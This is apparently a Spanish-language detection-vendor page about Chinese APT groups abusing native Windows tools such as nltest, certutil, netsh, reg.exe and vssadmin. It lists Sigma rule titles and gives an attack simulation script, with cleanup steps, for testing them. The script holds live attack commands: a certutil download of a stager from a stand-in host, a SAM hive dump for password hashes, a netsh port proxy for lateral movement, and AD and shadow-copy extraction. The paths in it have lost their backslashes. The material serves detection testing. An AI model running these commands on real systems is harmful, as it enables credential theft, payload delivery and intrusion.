Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
El artículo explora cómo los grupos de amenaza persistente avanzada chinos abusan de las utilidades integradas de Windows, a menudo referidas como LOLBAS, para realizar reconocimiento, robar credenciales y moverse lateralmente a través de entornos mientras se camuflan en la actividad administrativa rutinaria.
Investigación
Destaca el uso específico de herramientas nativas en línea de comandos como nltest, certutil, netsh, reg.exe, vssadmin, y otras, y señala las reglas Sigma que pueden ayudar a detectar estas técnicas dentro de plataformas SIEM.
Mitigación
Se anima a los defensores a monitorear la ejecución sospechosa de binarios nativos de Windows, hacer cumplir controles de acceso de menor privilegio, auditar modificaciones del registro y desplegar lógica de detección basada en los patrones Sigma referidos.
Respuesta
Cuando se identifica una actividad sospechosa de LOLBAS, los equipos de seguridad deben activar una alerta, aislar el host afectado, recopilar registros relevantes, confirmar si ocurrió un volcado de credenciales o movimiento lateral, y realizar análisis forenses en cualquier artefacto resultante.
Flujo de Ataque
Todavía estamos actualizando esta parte. Regístrate para recibir notificaciones
NotificarmeDetecciones
Posible Enumeración del Sistema (vía línea de comandos)
Ver
Posible Enumeración o Manipulación de Cuenta o Grupo (vía línea de comandos)
Ver
Descubrimiento Sospechoso de Confianzas de Dominio (vía línea de comandos)
Ver
LOLBAS wmic (vía línea de comandos)
Ver
LOLBAS DNSCmd (vía línea de comandos)
Ver
Uso de Certutil para Codificación de Datos y Operaciones de Certificados (vía línea de comandos)
Ver
Actividad Sospechosa de VSSADMIN (vía línea de comandos)
Ver
Posible Volcado de SAM/SYSTEM/SECURITY (vía línea de comandos)
Ver
Actividad Sospechosa de Ntdsutil (vía línea de comandos)
Ver
Copia Sospechosa de SAM/SECURITY/NTDS.dit vía Copia de Sombra (vía línea de comandos)
Ver
Uso Sospechoso de Utilidades de Windows para Reconocimiento y Robo de Credenciales [Creación de Procesos de Windows]
Ver
Ejecución de Simulación
Requisito previo: La verificación previa de Telemetría y Línea de Base debe haber pasado.
Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección.
-
Narrativa de Ataque y Comandos:
Un atacante que ha obtenido un punto de apoyo inicial en una estación de trabajo Windows unida a un dominio busca mapear el dominio, enumerar grupos privilegiados y recolectar material de credenciales usando solo binarios nativos para evitar activar firmas tradicionales de AV. Los pasos son:
- Enumerar Controladores de Dominio:
nltest /dclist:domain.local– revela todos los DCs en el dominio objetivo. - Recopilar Información del Sistema:
systeminfo– reúne la versión del sistema operativo, parches y detalles del hardware. - Listar Procesos en Ejecución:
tasklist– proporciona información sobre servicios privilegiados. - Consultar Registros de Eventos de Windows para Eventos de Inicio de Sesión:
Get-EventLog -LogName Security -InstanceId 4624(PowerShell) – extrae eventos exitosos de inicio de sesión. - Descargar un payload preparado:
certutil -urlcache -split -f https://example.com/stager.exe C:WindowsTempstager.exe– usa certutil para sortear filtros web. - Enumerar Administradores Locales:
net localgroup administrators– identifica cuentas privilegiadas. - Exportar el Registro Hive de SAM:
reg.exe save hklmsam C:sam.save– intenta volcar hashes de contraseñas. - Crear Proxy de Puerto para Movimiento Lateral:
netsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.0.0.5 connectport=3389– prepara un túnel. - Enumerar Registros DNS:
dnscmd . /enumrecords /zone– descubre zonas de DNS internas. - Exportar objetos de AD vía LDIFDE:
ldifde.exe -f C:WindowsTempad_dump.txt -p subtree– extrae datos del directorio. - Crear una Copia de Sombra de Volumen:
vssadmin create shadow /for=C:– habilita el acceso a nivel de archivo a archivos bloqueados.
Cada comando coincide exactamente con una de las cadenas “CommandLine|contains” en la regla Sigma, asegurando que la regla se dispare en los eventos de creación de procesos resultantes.
- Enumerar Controladores de Dominio:
-
Script de Prueba de Regresión: (PowerShell – autónomo, requiere derechos de administrador)
# TC-20260518-A7B9K – Simular uso adversario de utilidades nativas de Windows # NOTA: Ejecutar en un host Windows unido a un dominio con privilegios de administrador. # 1. Enumeración de controladores de dominio nltest /dclist:domain.local # 2. Información del sistema systeminfo # 3. Listar procesos tasklist # 4. Extracción de registro de eventos de seguridad (PowerShell) Get-EventLog -LogName security -InstanceId 4624 # 5. Descargar payload preparado vía certutil certutil -urlcache -split -f https://example.com/stager.exe C:WindowsTempstager.exe # 6. Enumerar administradores locales net localgroup administrators # 7. Exportar SAM hive reg.exe save hklmsam C:sam.save # 8. Configurar proxy de puerto netsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.0.0.5 connectport=3389 # 9. Enumeración de zona DNS dnscmd . /enumrecords /zone # 10. Exportar datos de AD vía LDIFDE ldifde.exe -f C:WindowsTempad_dump.txt -p subtree # 11. Crear una copia de sombra de volumen vssadmin create shadow /for=C: -
Comandos de Limpieza:
# Eliminar archivos creados durante la simulación Remove-Item -Path C:WindowsTempstager.exe -ErrorAction SilentlyContinue Remove-Item -Path C:sam.save -ErrorAction SilentlyContinue Remove-Item -Path C:WindowsTempad_dump.txt -ErrorAction SilentlyContinue # Eliminar la regla de portproxy netsh interface portproxy delete v4tov4 listenport=4444 # Eliminar la copia de sombra (opcional – requiere ID de copia de sombra) # vssadmin delete shadows /for=C: /all /quiet